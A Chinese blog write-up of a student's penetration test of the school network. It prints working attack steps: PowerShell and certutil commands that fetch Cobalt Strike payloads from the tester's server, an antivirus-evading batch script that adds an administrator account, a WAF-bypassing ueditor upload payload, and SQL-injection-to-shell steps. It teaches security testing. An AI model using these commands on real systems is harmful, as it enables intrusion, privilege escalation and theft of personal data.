实战 | 对自己学校内网的渗透测试

2024-08-29 18:47:38 浏览数 (1)

原文首发在:奇安信攻防社区

https://forum.butian.net/share/3671‍‍

一直以来都想拿自己学校的内网练练手,跟负责网安的老师说了一声后,回去直接开搞。这里作了比较详细的记录,希望大家能多多指点。

一、图书馆管理系统

1.1 SQL注入开启xp_cmdshell

1.1.1 首先是图书馆管理系统,这个系统是开在公网的。目录扫描发现Web Api Help接口文档泄露。我们拼接上图的第二个接口,发现在szReaderID参数处传入单数个单引号,就会报错;传入双数个单引号,就会回显操作成功。证明很可能存在注入。

1.1.2 sqlmap跑一下。因为是sql server,所以可以直接--os-shell开启xp_cmdshell来命令执行。当前的权限还很低,为了进一步提权,得上个CS马。

1.2 尝试远程下载上线CS

1.2.1 以下是一些常用的远程下载命令

certutil -urlcache -split -f http://127.0.0.1:8080/nc.txt c:\nc.txt //certutil下载文件

bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\Pstools.zip //bitsadmin下载文件

powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/nc.txt','nc.exe') //powershell下载文件

cmd /c start /min msedge.exe http://127.0.0.1/test.zip && timeout 5 && taskkill /f /t /im msedge.exe && C:/Users/%UserName%/Downloads/test.zip //msedge下载并执行

1.2.2 tasklist /svc 看一下,发现有defender,那么我们就可以做个免杀CS马传上去。先在本地开启一个python的http服务,把马放在上面,再在sqlmap上让目标服务器执行powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://xxx.xxx.xxx.xx:8000/360safe.exe','c:\programdata\360safe.exe') ,把马360safe.exe远程下载到他C盘的programdata目录下。

1.2.3 成功地传上了马,但执行木马时,却发现无法执行。后面又尝试把马放到其他几个目录执行,也还是不行。可能是权限问题。

1.3 找网站根目录写shell

1.3.1 那就写aspx的webshell到网站里吧。这里存放js的目录也是可以解析aspx的,我们可以执行命令全局搜索目标系统的js文件。

Dir /s /b D:\app.a1cccec9.js

得知其该系统存放JS的目录是D:\disttsgdistjs 。这时我们就可以让目标服务器抓取webshell了。

1.3.2 先去浏览器访问一下shell,显示是存在的而且已经成功解析。可刚连接成功就变成404了。我心想之前没见过defender杀冰蝎马啊,感觉是有别的东西在作怪。

于是乎又用了哥斯拉不同加密方式的马,全都是刚连上就没了。正在我一筹莫展的时候,朋友提醒我可以尝试改一下冰蝎的默认密码。结果传上去再连真就不被杀了。

1.4 成功上线CS提权

1.4.1 在冰蝎的“命令执行”模块下,执行命令时回显拒绝访问。但在“虚拟终端”模块下可以正常执行。信息收集了一下发现没有域,属于工作组。于是再把CS马丢上去执行。这里终于成功上线了。

1.4.2 是台win10,CS直接getsystem。得到system令牌后直接抓hash还是会失败。于是可以使用巨龙拉冬插件的“本地提权”下的“System2Admin”功能。利用伪造的system权限,反弹一个管理员权限的会话回来。用这个管理员权限的会话就可以抓密码的哈希值啦。

1.5 拿到大量数据和权限

1.5.1 去cmd5解出了密码 ,再用超级弱口令爆破工具喷洒一下B段,发现三台服务器都是这个密码。那直接去远程连接。用windows的mstsc连接的时候会报错,我不记得具体报错是什么了,总之后面是去kali连的。kali自带的远程连接工具有xfreerdp和rdesktop,我比较喜欢前者。

xfreerdp /u:Administrator /p:Password123 /v:xxx.xxx.xxx.xxx /size:80%

1.5.2 在其中一台服务器的桌面上发现了一个神秘的文本文档,打开以后发现明显是一串密码。

1.5.3 用上面的密码尝试登录这台服务器上面运行的WEB系统,果不其然登录成功,拿下全校教室电源和多媒体控制权。

1.5.4 关杀软后把searchall丢到服务器上,收集一下敏感文件以及浏览器缓存的信息。这里从浏览器缓存中得到了服务器管理员的校园网账号密码。

工具链接: https://github.com/Naturehi666/searchall

1.5.5 第二台机器是win2008server,上面宝塔面板搭建的网站早已废弃,也没啥敏感信息。在第三台win10中同样找到了一些web的密码,成功登录我们学院的教学实训平台管理端。

1.5.6 丢CS马到第三台服务器上,用CS插件收集navicat和xshell的缓存密码,拿下2个mysql数据库和4台linux主机。

二、违规联网检测系统

2.1 接口未授权得到管理员密码

2.1.1 开局经典登录框,登陆包的密码被加密了不好爆破。这种vue.js框架的系统可以多去找一下js接口未授权,经过一番测试,发现/api/v1/system/user接口泄露了管理员密码。这里忘记截图了。

2.1.2 进去发现这个系统记录着全校学生的“访问国外网站”记录,以及访问违法网站、境外网站的详细记录(难绷)。

2.2 sql注入到udf提权

2.2.1 挂上burpsuite的被动插件xiasql在后台东点西点,很快发现 /api/v1/toolAct/findAgg?orderBy= 这里存在注入。而且这个接口也是未授权,不登录也能直接访问,所以可以把url直接丢sqlmap跑。

2.2.2 拿到密码的哈希后,请了有cmd5会员的同学帮我解,然后直接navicat连接。

2.2.3 如上图所示,show variables like 'secure_file_priv',发现输出为空,证明这个数据库有任意目录读写的权限。show variables like '%version_%',得知服务器是32位的windows。那么就可以使用sqlmap -d "mysql://root:密码@xxx.xxx.xxx.xxx:3306/mysql" --random-agent --os-shell 尝试UDF提权。

2.3 绕过火绒添加用户

2.3.1 提权成功,有了system权限,可以尝试添加用户远程连接。

net user newuser password123 /add

net localgroup administrators newuser /add

但添加用户时又回显超时,想起来应该是有杀软在拦截命令行添加用户。一看果不其然,有火绒。

2.3.2 可以使用如下方法绕过火绒添加用户。我们可以编写一个.bat命令批处理脚本,内容如下:

copy c:windowssystem32net1.exe d:update.exe

d:update.exe user newuser password123 /ad

net localgroup administrators newuser /ad

意为将net1.exe复制到D盘并重命名为update.exe,用这个update.exe来新增用户。这里注意不能用net.exe,会被拦截,用net1.exe才行。/add可以用/ad替代。若将这里的update.exe 放在C盘的目录也不能成功执行,本地测试仍会被火绒拦,如下图所示。所以最好将其添加到非系统盘。(最后要记得删除)

2.3.3 执行命令,让服务器抓取我们的脚本,然后执行。这里一定不能用certutil命令下载,火绒会拦截。powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://xxx.xxx.xxx.xxx:8000/1.bat','d:1.bat')最后也是很顺利地绕过火绒添加了用户,远程连接成功。

2.3.4 searchall收集了一批密码,上面有些web已经没了,剩下的登上去也没有什么东西。mimikatz抓了本机密码,可惜也没喷洒出相同密码的服务器。(下图厚码保命)

2.3.5 这台服务器的9200端口还有Elastic未授权,可以用ElasticHD进行可视化管理。

工具链接: https://github.com/qax-os/ElasticHD

三、网络报修登记系统

3.1 注入得到全校教师SFZ号

3.1.1 下面去看看这个报修系统。路径一删发现目录遍历,但未授权访问进去的页面都静态的,点击不了功能点。

3.1.2 但在未授权访问的页面里,用findsomething插件发现了/api/getPageData.php这个路径,拼接发现可以正常回显报修信息。

3.1.3 像这种回显json格式数据的路径一般都有传参的。fuzz一下常见参数,如id、date、page等,发现通通没有。上个参数字典爆破一下,最后发现有filter这个参数。

3.1.4 加单引号报错,直接上sqlmap。一番查找后从某表中dump出了全校教职工的身份证号和手机号,共有几千条。可惜不能堆叠查询,password也解不出。

3.2 accesskey和accessecret泄露

3.2.1 扫下目录,发现了/controller/ ,打开又是同样的目录遍历。

3.2.2 在reset_HT_ETL_log.py 发现数据库密码,以及阿里云的accesskey,accessecret泄露。

3.2.3 满怀期待地去ossbrowser登录,点进去却发现云资产空空如也,并没有实例。得到了数据库密码,但数据库端口没有开放。扫了一下全端口也没有发现,于是没能往下继续。

工具链接: https://github.com/aliyun/oss-browser

四、会计实训系统

4.1 .net ueditor 文件上传

4.1.1 下面是一个会计实训系统,目录扫描发现了.net的ueditor。

4.1.2 这里的漏洞利用不需要构造html上传页面,可以使用较为简单的方法上马。我们可以在VPS开启一个http服务,将冰蝎马的后缀由aspx改成jpg,即security.jpg。然后将图片马投放到http服务器上。

4.1.3 我们再用火狐插件hackbar发送post请求,post请求体为source[]=http://xxx.xxx.xxx.xxx/security.jpg?.aspx。这里发送后会直接被WAF重置连接。我们可以改成source[]=http://xxx.xxx.xxx.xxx/security.jpg?.a?s?p?x绕过WAF,让目标抓取我们http服务器上的图片马并解析。

4.1.4 连上冰蝎后丢免杀CS马进去,上线成功但无法提权。

五、剩下的一些其他成果

5.1 简单的文件上传

5.1.1 简单的前端验证,禁用JS上马。

5.1.2 该服务器不出网,也ping不通我连着校园网的主机。搞个MSF的正向马,做一下免杀上线MSF。其上面有360全家桶和我第一次见的诺顿杀毒,令牌没有高权限的,一提权马就被杀,最后没能提权。

5.2 网络设备RCE 写马

5.2.1 某网络设备ping功能点存在RCE,找到根目录后手工写马拿了一台。

5.3 Shiro一把梭

六、后续

6.1 最后再把那些弱口令、未授权、任意文件下载、XSS之类的小洞整合一下,硬是整出了127页的渗透报告。整理好后发给了老师,结果这回复是我没想到的。

6.2 难绷。掉小珍珠了。

0 人点赞